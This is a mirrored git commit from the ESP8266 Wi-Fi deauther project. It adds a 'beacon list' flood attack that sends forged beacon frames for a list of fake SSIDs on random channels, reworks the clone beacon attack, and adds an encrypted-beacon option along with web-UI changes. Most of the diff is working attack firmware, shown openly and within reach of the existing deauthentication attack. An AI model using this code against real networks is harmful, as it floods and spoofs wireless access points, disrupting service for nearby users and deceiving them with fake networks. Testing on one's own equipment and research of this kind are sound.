mirror of
https://github.com/SpacehuhnTech/esp8266_deauther.git
synced 2025-12-22 23:26:49 -08:00
Implemented beacon list attack
and improved the json string generation
This commit is contained in:
Stefan Kremser
@@ -92,7 +92,7 @@ String APScan::getResults(){
|
||||
json += "\"m\":\""+getAPMac(i)+"\",";
|
||||
json += "\"ss\":\""+getAPName(i)+"\",";
|
||||
json += "\"r\":"+(String)getAPRSSI(i)+",";
|
||||
json += "\"e\":\""+(String)encryption[i]+"\",";
|
||||
json += "\"e\":"+(String)encryption[i]+",";
|
||||
//json += "\"v\":\""+getAPVendor(i)+"\",";
|
||||
json += "\"se\":"+(String)getAPSelected(i);
|
||||
json += "}";
|
||||
|
||||
@@ -11,6 +11,7 @@ void Attack::generate(){
|
||||
uint8_t _randomMacBuffer[6];
|
||||
beaconAdrs._clear();
|
||||
|
||||
for(int i=0;i<macListLen;i++) channels[i] = random(1,12);
|
||||
do{
|
||||
getRandomVendorMac(_randomMacBuffer);
|
||||
for(int i=0;i<6;i++) _randomBeaconMac.setAt(_randomMacBuffer[i],i);
|
||||
@@ -37,7 +38,7 @@ void Attack::buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason){
|
||||
packet[24] = reason;
|
||||
}
|
||||
|
||||
void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encrypt){
|
||||
void Attack::buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt){
|
||||
packetSize = 0;
|
||||
int ssidLen = _ssid.length();
|
||||
if(ssidLen>32) ssidLen = 32;
|
||||
@@ -48,9 +49,6 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
|
||||
}
|
||||
|
||||
for(int i=0;i<6;i++){
|
||||
//set target (client)
|
||||
//packet[4+i] = _client._get(i);
|
||||
packet[4+i] = _client._get(i);
|
||||
//set source (AP)
|
||||
packet[10+i] = packet[16+i] = _ap._get(i);
|
||||
}
|
||||
@@ -150,7 +148,7 @@ void Attack::run(){
|
||||
}
|
||||
}
|
||||
|
||||
/* =============== Beacon Attack =============== */
|
||||
/* =============== Beacon clone Attack =============== */
|
||||
if(isRunning[1] && currentMillis-prevTime[1] >= 100){
|
||||
if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
|
||||
prevTime[1] = millis();
|
||||
@@ -160,15 +158,13 @@ void Attack::run(){
|
||||
String _ssid = apScan.getAPName(a);
|
||||
int _ssidLen = _ssid.length();
|
||||
int _restSSIDLen = 32 - _ssidLen;
|
||||
int _ch = apScan.getAPChannel(a);
|
||||
|
||||
Mac _broadcast;
|
||||
_broadcast.set(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF);
|
||||
//int _ch = apScan.getAPChannel(a);
|
||||
|
||||
//wifi_set_channel(_ch);
|
||||
|
||||
for(int c=0;c<macListLen/apScan.selectedSum;c++){
|
||||
String _apName = _ssid;
|
||||
int _ch = channels[c];
|
||||
|
||||
if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP "
|
||||
else if(c < _restSSIDLen*2){
|
||||
@@ -182,7 +178,7 @@ void Attack::run(){
|
||||
_apName += (String)c;//e.g. "SAMPLEAP 78"
|
||||
}
|
||||
|
||||
buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none");
|
||||
buildBeacon(beaconAdrs._get(c),_apName,_ch,apScan.getAPEncryption(a) != "none");
|
||||
|
||||
if(send()) packetsCounter[1]++;
|
||||
}
|
||||
@@ -204,6 +200,34 @@ void Attack::run(){
|
||||
}
|
||||
}
|
||||
|
||||
/* =============== Beacon list Attack =============== */
|
||||
if(isRunning[2] && currentMillis-prevTime[2] >= 100){
|
||||
if(debug) Serial.print("running "+(String)attackNames[2]+" attack");
|
||||
prevTime[2] = millis();
|
||||
|
||||
for(int a=0;a<ssidList.len;a++){
|
||||
String _ssid = ssidList.get(a);
|
||||
int _ch = channels[a];
|
||||
|
||||
buildBeacon(beaconAdrs._get(a),_ssid,_ch,settings.attackEncrypted);
|
||||
|
||||
if(send()) packetsCounter[2]++;
|
||||
}
|
||||
|
||||
stati[2] = (String)(packetsCounter[2]*10)+"pkts/s";
|
||||
packetsCounter[2] = 0;
|
||||
macListChangeCounter++;
|
||||
if(macListChangeCounter/10 >= macChangeInterval){
|
||||
generate();
|
||||
macListChangeCounter = 0;
|
||||
}
|
||||
if(debug) Serial.println("done");
|
||||
if(settings.attackTimeout > 0){
|
||||
attackTimeoutCounter[2]++;
|
||||
if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2);
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
void Attack::start(int num){
|
||||
@@ -213,8 +237,9 @@ void Attack::start(int num){
|
||||
prevTime[num] = millis();
|
||||
attackTimeoutCounter[num] = 0;
|
||||
if(debug) Serial.println("starting "+(String)attackNames[num]+" attack");
|
||||
if(num == 1 && isRunning[2]) stop(2);
|
||||
else if(num == 2 && isRunning[1]) stop(1);
|
||||
}else stop(num);
|
||||
|
||||
}
|
||||
|
||||
void Attack::stop(int num){
|
||||
@@ -233,12 +258,10 @@ void Attack::stopAll(){
|
||||
String Attack::getResults(){
|
||||
if(debug) Serial.print("getting attacks JSON...");
|
||||
|
||||
for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready";
|
||||
|
||||
if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP";
|
||||
else {
|
||||
for(int i=0;i<attacksNum;i++){
|
||||
if(!isRunning[i]) stati[i] = "ready";
|
||||
}
|
||||
}
|
||||
if(ssidList.len < 1) stati[2] = "no SSID";
|
||||
|
||||
int _selected;
|
||||
String json = "{ \"aps\": [";
|
||||
|
||||
@@ -14,7 +14,7 @@ extern "C" {
|
||||
#include "Settings.h"
|
||||
#include "SSIDList.h"
|
||||
|
||||
#define attacksNum 2
|
||||
#define attacksNum 3
|
||||
#define macListLen 64
|
||||
#define macChangeInterval 4
|
||||
|
||||
@@ -41,11 +41,11 @@ class Attack
|
||||
private:
|
||||
|
||||
void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason);
|
||||
void buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encrypt);
|
||||
void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt);
|
||||
bool send();
|
||||
|
||||
//attack declarations
|
||||
const String attackNames[attacksNum] = {"deauth","beacon (clone)"/*,"beacon (list)"*/};
|
||||
const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"};
|
||||
|
||||
//attack infos
|
||||
String stati[attacksNum];
|
||||
@@ -108,6 +108,7 @@ class Attack
|
||||
|
||||
int macListChangeCounter = 0;
|
||||
int attackTimeoutCounter[attacksNum];
|
||||
int channels[macListLen];
|
||||
};
|
||||
|
||||
#endif
|
||||
|
||||
@@ -122,12 +122,12 @@ String ClientScan::getResults(){
|
||||
String json = "{ \"clients\":[";
|
||||
for(int i=0;i<results && i<maxClientScanResults;i++){
|
||||
json += "{";
|
||||
json += "\"id\": "+(String)i+",";
|
||||
json += "\"packets\": "+(String)getClientPackets(i)+",";
|
||||
json += "\"mac\": \""+getClientMac(i).toString()+"\",";
|
||||
json += "\"name\": \""+(String)nameList.get(getClientMac(i))+"\",";
|
||||
json += "\"vendor\": \""+(String)getClientVendor(i)+"\",";
|
||||
json += "\"selected\": "+(String)getClientSelected(i);
|
||||
json += "\"i\":"+(String)i+",";
|
||||
json += "\"p\":"+(String)getClientPackets(i)+",";
|
||||
json += "\"m\":\""+getClientMac(i).toString()+"\",";
|
||||
json += "\"n\":\""+(String)nameList.get(getClientMac(i))+"\",";
|
||||
json += "\"v\":\""+(String)getClientVendor(i)+"\",";
|
||||
json += "\"s\":"+(String)getClientSelected(i);
|
||||
json += "}";
|
||||
if((i!=results-1) && (i!=maxClientScanResults-1)) json += ",";
|
||||
}
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#ifndef ClientScan_h
|
||||
#define ClientScan_h
|
||||
|
||||
#define maxClientScanResults 30
|
||||
#define maxClientScanResults 40
|
||||
|
||||
#include <ESP8266WiFi.h>
|
||||
#include "Mac.h"
|
||||
|
||||
@@ -19,6 +19,7 @@ void Settings::load(){
|
||||
attackTimeout = eepromReadInt(attackTimeoutAdr);
|
||||
attackPacketRate = EEPROM.read(attackPacketRateAdr);
|
||||
clientScanTime = EEPROM.read(clientScanTimeAdr);
|
||||
attackEncrypted = (bool)EEPROM.read(attackEncryptedAdr);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -35,6 +36,7 @@ void Settings::reset(){
|
||||
attackTimeout = 5*60;
|
||||
attackPacketRate = 10;
|
||||
clientScanTime = 15;
|
||||
attackEncrypted = false;
|
||||
|
||||
if(debug) Serial.println("done");
|
||||
|
||||
@@ -57,6 +59,7 @@ void Settings::save(){
|
||||
|
||||
EEPROM.write(attackPacketRateAdr, attackPacketRate);
|
||||
EEPROM.write(clientScanTimeAdr, clientScanTime);
|
||||
EEPROM.write(attackEncryptedAdr, attackEncrypted);
|
||||
EEPROM.commit();
|
||||
|
||||
if(debug){
|
||||
@@ -75,6 +78,7 @@ void Settings::info(){
|
||||
Serial.println("attack timeout: "+(String)attackTimeout);
|
||||
Serial.println("attack packet rate: "+(String)attackPacketRate);
|
||||
Serial.println("client scan time: "+(String)clientScanTime);
|
||||
Serial.println("attack SSID encrypted: "+(String)attackEncrypted);
|
||||
}
|
||||
|
||||
String Settings::get(){
|
||||
@@ -86,14 +90,14 @@ String Settings::get(){
|
||||
json += "\"attackTimeout\":"+(String)attackTimeout+",";
|
||||
json += "\"attackPacketRate\":"+(String)attackPacketRate+",";
|
||||
json += "\"clientScanTime\":"+(String)clientScanTime+",";
|
||||
json += "\"attackEncrypted\":"+(String)attackEncrypted+",";
|
||||
|
||||
json += "\"nameList\":[";
|
||||
for(int i=0;i<nameList.len;i++){
|
||||
json += "{";
|
||||
json += "\"id\":"+(String)i+",";
|
||||
json += "\"name\":\""+nameList.getName(i)+"\",";
|
||||
json += "\"mac\":\""+nameList.getMac(i).toString()+"\",";
|
||||
json += "\"vendor\":\""+data_getVendor(nameList.getMac(i)._get(0), nameList.getMac(i)._get(1), nameList.getMac(i)._get(2))+"\"";
|
||||
json += "\"n\":\""+nameList.getName(i)+"\",";
|
||||
json += "\"m\":\""+nameList.getMac(i).toString()+"\",";
|
||||
json += "\"v\":\""+data_getVendor(nameList.getMac(i)._get(0), nameList.getMac(i)._get(1), nameList.getMac(i)._get(2))+"\"";
|
||||
json += "}";
|
||||
if(i!=nameList.len-1) json += ",";
|
||||
}
|
||||
|
||||
@@ -20,6 +20,7 @@ extern NameList nameList;
|
||||
#define attackTimeoutAdr 1091
|
||||
#define attackPacketRateAdr 1093
|
||||
#define clientScanTimeAdr 1094
|
||||
#define attackEncryptedAdr 1095
|
||||
|
||||
class Settings
|
||||
{
|
||||
@@ -41,6 +42,7 @@ class Settings
|
||||
int attackPacketRate;
|
||||
|
||||
int clientScanTime;
|
||||
bool attackEncrypted;
|
||||
private:
|
||||
};
|
||||
|
||||
|
||||
File diff suppressed because one or more lines are too long
@@ -18,7 +18,7 @@ extern "C" {
|
||||
#include "SSIDList.h"
|
||||
|
||||
/* ========== DEBUG ========== */
|
||||
const bool debug = true;
|
||||
const bool debug = false;
|
||||
/* ========== DEBUG ========== */
|
||||
|
||||
ESP8266WebServer server(80);
|
||||
@@ -222,6 +222,10 @@ void saveSettings(){
|
||||
if(server.hasArg("timeout")) settings.attackTimeout = server.arg("timeout").toInt();
|
||||
if(server.hasArg("deauthReason")) settings.deauthReason = server.arg("deauthReason").toInt();
|
||||
if(server.hasArg("packetRate")) settings.attackPacketRate = server.arg("packetRate").toInt();
|
||||
if(server.hasArg("ssidEnc")){
|
||||
if(server.arg("ssidEnc") == "false") settings.attackEncrypted = false;
|
||||
else settings.attackEncrypted = true;
|
||||
}
|
||||
|
||||
settings.save();
|
||||
server.send( 200, "text/json", "true" );
|
||||
|
||||
@@ -48,10 +48,11 @@
|
||||
If no client is selected, the packets are sent as broadcast!
|
||||
<br><br>
|
||||
<b>beacon [beacon flood attack]:</b><br>
|
||||
Spams beacon frames with a similar SSID as the selected WiFi access point(s).
|
||||
(clone:) spams beacon frames with a similar SSID as the selected WiFi access point(s).<br />
|
||||
(list:) spams beacon frames with all SSIDs in the list below.
|
||||
</p>
|
||||
<br />
|
||||
<p class="block bold">SSIDs: <button class="marginNull warnBtn" onclick="clearSSID()">clear</button> <button class="marginNull" onclick="randomSSID()">random</button> <button class="marginNull" onclick="addSSID()">add</button></p>
|
||||
<p class="block bold">SSIDs: <span id="ssidCounter">0/64</span> <button class="marginNull warnBtn" onclick="clearSSID()">clear</button> <button class="marginNull" onclick="randomSSID()">random</button> <button class="marginNull" onclick="addSSID()">add</button></p>
|
||||
<br />
|
||||
<table>
|
||||
</table>
|
||||
@@ -65,6 +66,7 @@
|
||||
var table = document.getElementsByTagName("table")[0];
|
||||
var ssidList = document.getElementsByTagName("table")[1];
|
||||
var saved = document.getElementById("saved");
|
||||
var ssidCounter = document.getElementById("ssidCounter");
|
||||
var resultInterval;
|
||||
var res;
|
||||
|
||||
@@ -94,6 +96,8 @@
|
||||
}
|
||||
table.innerHTML = tr;
|
||||
|
||||
ssidCounter.innerHTML = res.ssid.length+"/64";
|
||||
|
||||
var tr = "<tr><th>Name</th><th>X</th></tr>";
|
||||
for(var i=0;i<res.ssid.length;i++){
|
||||
tr += "<tr>";
|
||||
|
||||
@@ -59,8 +59,8 @@
|
||||
var res;
|
||||
|
||||
function compare(a,b) {
|
||||
if (a.packets > b.packets) return -1;
|
||||
if (a.packets < b.packets) return 1;
|
||||
if (a.p > b.p) return -1;
|
||||
if (a.p < b.p) return 1;
|
||||
return 0;
|
||||
}
|
||||
|
||||
@@ -84,15 +84,15 @@
|
||||
|
||||
for(var i=0;i<res.clients.length;i++){
|
||||
|
||||
if(res.clients[i].selected) tr += '<tr class="selected">';
|
||||
if(res.clients[i].s == 1) tr += '<tr class="selected">';
|
||||
else tr += '<tr>';
|
||||
tr += '<td>'+res.clients[i].packets+'</td>';
|
||||
tr += '<td>'+res.clients[i].vendor+'</td>';
|
||||
tr += '<td>'+res.clients[i].name+' <a class="blue" onclick="changeName('+res.clients[i].id+')">edit</a></td>';
|
||||
tr += '<td>'+res.clients[i].mac+'</td>';
|
||||
tr += '<td>'+res.clients[i].p+'</td>';
|
||||
tr += '<td>'+res.clients[i].v+'</td>';
|
||||
tr += '<td>'+res.clients[i].n+' <a class="blue" onclick="changeName('+res.clients[i].i+')">edit</a></td>';
|
||||
tr += '<td>'+res.clients[i].m+'</td>';
|
||||
|
||||
if(res.clients[i].selected) tr += '<td><button class="marginNull selectedBtn" onclick="select('+res.clients[i].id+')">deselect</button></td>';
|
||||
else tr += '<td><button class="marginNull" onclick="select('+res.clients[i].id+')">select</button></td>';
|
||||
if(res.clients[i].s == 1) tr += '<td><button class="marginNull selectedBtn" onclick="select('+res.clients[i].i+')">deselect</button></td>';
|
||||
else tr += '<td><button class="marginNull" onclick="select('+res.clients[i].i+')">select</button></td>';
|
||||
|
||||
tr += '</tr>';
|
||||
}
|
||||
@@ -130,7 +130,7 @@
|
||||
}
|
||||
|
||||
function changeName(id){
|
||||
var newName = prompt("Name for "+res.clients[id].mac);
|
||||
var newName = prompt("Name for "+res.clients[id].m);
|
||||
if(newName != null){
|
||||
getResponse("setName.json?id="+id+"&name="+newName,function(responseText){
|
||||
if(responseText == "true") getResults();
|
||||
|
||||
@@ -81,10 +81,11 @@
|
||||
}
|
||||
|
||||
function getEncryption(num){
|
||||
if(num == 5) return "WEP";
|
||||
else if(num == 2) return "WPA";
|
||||
if(num == 8) return "WPA*";
|
||||
else if(num == 4) return "WPA2";
|
||||
else if(num == 8) return "WPA*";
|
||||
else if(num == 2) return "WPA";
|
||||
else if(num == 7) return "none";
|
||||
else if(num == 5) return "WEP";
|
||||
}
|
||||
|
||||
function getResults(){
|
||||
|
||||
@@ -53,6 +53,10 @@
|
||||
<input type="number" id="timeout" min="-1" max="65536">s
|
||||
<p class="small">0 = no timeout</p>
|
||||
|
||||
<label for="ssidEnc">beacon encrypted:</label>
|
||||
<input type="checkbox" name="ssidEnc" id="ssidEnc" value="true">
|
||||
<br />
|
||||
|
||||
<label for="deauthReason">deauth reason:</label>
|
||||
<input type="number" id="deauthReason" min="1" max="45">
|
||||
<p class="small">reason codes: <a target="_blank" href="http://www.aboutcher.co.uk/2012/07/linux-wifi-deauthenticated-reason-codes/">click</a></p>
|
||||
@@ -88,6 +92,7 @@
|
||||
var packetRate = document.getElementById('packetRate');
|
||||
var saved = document.getElementById('saved');
|
||||
var clientNames = document.getElementById('clientNames');
|
||||
var ssidEnc = document.getElementById('ssidEnc');
|
||||
var res;
|
||||
|
||||
function getData(){
|
||||
@@ -100,6 +105,7 @@
|
||||
timeout.value = res.attackTimeout;
|
||||
deauthReason.value = res.deauthReason;
|
||||
packetRate.value = res.attackPacketRate;
|
||||
ssidEnc.checked = res.attackEncrypted;
|
||||
|
||||
clientNames.innerHTML = "Client Names "+res.nameList.length+"/50";
|
||||
|
||||
@@ -108,10 +114,10 @@
|
||||
for(var i=0;i<res.nameList.length;i++){
|
||||
|
||||
tr += '<tr>';
|
||||
tr += '<td>'+res.nameList[i].mac+'</td>';
|
||||
tr += '<td>'+res.nameList[i].vendor+'</td>';
|
||||
tr += '<td>'+res.nameList[i].name+' <a class="blue" onclick="changeName('+res.nameList[i].id+')">edit</a></td>';
|
||||
tr += '<td><button class="marginNull warnBtn" onclick="deleteName('+res.nameList[i].id+')">x</button></td>';
|
||||
tr += '<td>'+res.nameList[i].m+'</td>';
|
||||
tr += '<td>'+res.nameList[i].v+'</td>';
|
||||
tr += '<td>'+res.nameList[i].n+' <a class="blue" onclick="changeName('+i+')">edit</a></td>';
|
||||
tr += '<td><button class="marginNull warnBtn" onclick="deleteName('+i+')">x</button></td>';
|
||||
|
||||
tr += '</tr>';
|
||||
}
|
||||
@@ -121,7 +127,7 @@
|
||||
}
|
||||
|
||||
function changeName(id){
|
||||
var newName = prompt("Name for "+res.nameList[id].mac);
|
||||
var newName = prompt("Name for "+res.nameList[id].m);
|
||||
if(newName != null){
|
||||
getResponse("editNameList.json?id="+id+"&name="+newName,function(responseText){
|
||||
if(responseText == "true") getData();
|
||||
@@ -146,6 +152,7 @@
|
||||
url += "&timeout="+timeout.value;
|
||||
url += "&deauthReason="+deauthReason.value;
|
||||
url += "&packetRate="+packetRate.value;
|
||||
url += "&ssidEnc="+ssidEnc.checked;
|
||||
|
||||
getResponse(url, function(responseText){
|
||||
if(responseText == "true"){
|
||||
|
||||
Reference in New Issue
Block a user